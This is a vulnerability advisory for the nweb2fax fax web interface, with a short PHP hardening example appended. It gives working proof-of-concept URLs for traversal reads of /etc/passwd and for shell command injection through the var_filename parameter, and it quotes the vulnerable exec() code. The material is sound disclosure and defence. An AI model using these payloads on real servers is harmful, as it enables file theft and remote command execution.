Vendor: nweb2fax
By: dun
CVSS: 8.8 (HIGH)
Local File Inclusion, Arbitrary File Download, Remote Command Execution
CWE: 22, 434, 78
Product Name: nweb2fax
Affected Version From: 2000.2.7
Affected Version To: 2000.2.7
Patch Exists: YES
2009

nweb2fax <= 0.2.7 Multiple Remote Vulnerabilities

nweb2fax is affected by multiple remote vulnerabilities. The first is a Local File Inclusion in comm.php (the id parameter), which allows an attacker to read any file on the server. The second is an Arbitrary File Download in viewrq.php (the var_filename parameter with format=ps), which allows an attacker to download any file from the server. The third is Remote Command Execution in viewrq.php (the var_filename parameter with format=tif or format=pdf), which allows an attacker to execute arbitrary commands on the server.

Mitigation:

Upgrade to the latest version of nweb2fax, disable the script if not in use, and restrict access to the script.

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##################################################################
 #  [  nweb2fax <= 0.2.7   Multiple Remote Vulnerabilities  ]     #
 ##################################################################
 #
 # Script site:  http://sourceforge.net/projects/nweb2fax/
 # 
 # [ Local File Inclusion Vulnerability ]:
 #  *** /comm.php?id=../../../../../../../../../../etc/passwd
 #
 # Bug:
 #
 # ...
 # $var_id=$_GET['id'];
 # $fileary = file ( "$DIR_SPOOL/log/c$var_id" );
 # reset($fileary);
 # foreach ($fileary as $line) {
 # 	if( trim($line) != "" ){
 # 		print "<br>$line";
 # 	}
 # }
 # ...
 #
 #
 # [ Arbitrary File Download Vulnerability ]:
 #
 #  *** /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
 #
 # Bug:
 #
 # ...
 # $var_filename=$_GET['var_filename'];
 # $var_format=$_GET['format'];
 # ...
 # if( $var_format == "ps" ) {
 #   $filename = "$DIR_SPOOL/$var_filename";
 #   header("Content-Type: application/postscript");
 #   header('Content-Disposition: attachment; filename="downloaded.ps"');
 #   readfile("$filename");
 # ...
 #
 #
 # [ Remote Command Execution 1]:
 # *** /viewrq.php?format=tif&var_filename=;id%3E/tmp/id.txt;chmod%20777%20/tmp/id.txt;
 #
 # Bug:
 # ...
 # $var_filename=$_GET['var_filename'];
 # $var_format=$_GET['format'];
 # ...
 # } elseif ($var_format == "pdf")  {
 # ...
 # $recvq_filename = "$DIR_SPOOL/$var_filename";
 # ...
 # exec("$PROG_TIFF2PS -a -O $FILE_TMP1 $recvq_filename",$exec_output,$exec_return);
 # ...
 # 
 #
 # [ Remote Command Execution 2]:
 # *** /viewrq.php?format=pdf&var_filename=;id%3E/tmp/id2.txt;chmod%20777%20/tmp/id2.txt;id
 #      
 # Bug:
 # ...
 # $var_filename=$_GET['var_filename'];
 # $var_format=$_GET['format'];
 # ...
 # } elseif ($var_format == "pdf")  {
 # ...
 # $recvq_filename = "$DIR_SPOOL/$var_filename";
 # ...
 #  $cmd="$PROG_CAT $recvq_filename | $PROG_GS $gs_options";
 # ...
 #  exec($cmd,$exec_output,$exec_return);
 # ...
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
 ###############################################

 [ dun / 2008 ] 

# milw0rm.com [2008-06-18]
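
A hardened form of the parameter handling quoted in the comm.php and viewrq.php snippets above, given as an added example that is not part of the advisory or of nweb2fax. The helper names resolve_spool_file and tiff2ps_command are hypothetical, and the spool layout, sample file name and tool path are assumptions.

```php
<?php
// Added example, not nweb2fax code. $DIR_SPOOL and $PROG_TIFF2PS are the
// advisory's variable names; the helper names and sample values are assumptions.

// Map a request parameter to a real file below $baseDir, or return null.
function resolve_spool_file(string $baseDir, string $name): ?string
{
    // Allow-list the characters first: no ';', '|', '>', spaces or NUL bytes.
    if (!preg_match('#\A[A-Za-z0-9._/-]+\z#', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name);   // resolves '..' and symlinks
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Containment: the resolved path must still be inside the spool directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Build the tiff2ps command line with every operand quoted for the shell.
function tiff2ps_command(string $prog, string $tmpFile, string $inFile): string
{
    return escapeshellarg($prog) . ' -a -O ' . escapeshellarg($tmpFile)
         . ' ' . escapeshellarg($inFile);
}

// Constructed demo: a throwaway spool directory holding one fax file.
$DIR_SPOOL = sys_get_temp_dir() . '/spool_demo_' . getmypid();
mkdir("$DIR_SPOOL/recvq", 0700, true);
file_put_contents("$DIR_SPOOL/recvq/fax000000001.tif", 'demo');
$PROG_TIFF2PS = '/usr/bin/tiff2ps';             // assumed install path

$samples = ['recvq/fax000000001.tif', '../../../../etc/passwd', ';id>/tmp/id.txt;'];
foreach ($samples as $name) {
    $path = resolve_spool_file($DIR_SPOOL, $name);
    if ($path === null) {
        echo "rejected: $name\n";
        continue;
    }
    echo 'accepted: ', tiff2ps_command($PROG_TIFF2PS, '/tmp/out.ps', $path), "\n";
}
// Remove the demo files again.
unlink("$DIR_SPOOL/recvq/fax000000001.tif");
rmdir("$DIR_SPOOL/recvq");
rmdir($DIR_SPOOL);
```

The same resolve step applies before the file() call in comm.php and the readfile() call in viewrq.php; only the name that passes both the allow-list and the containment check reaches the filesystem or the shell.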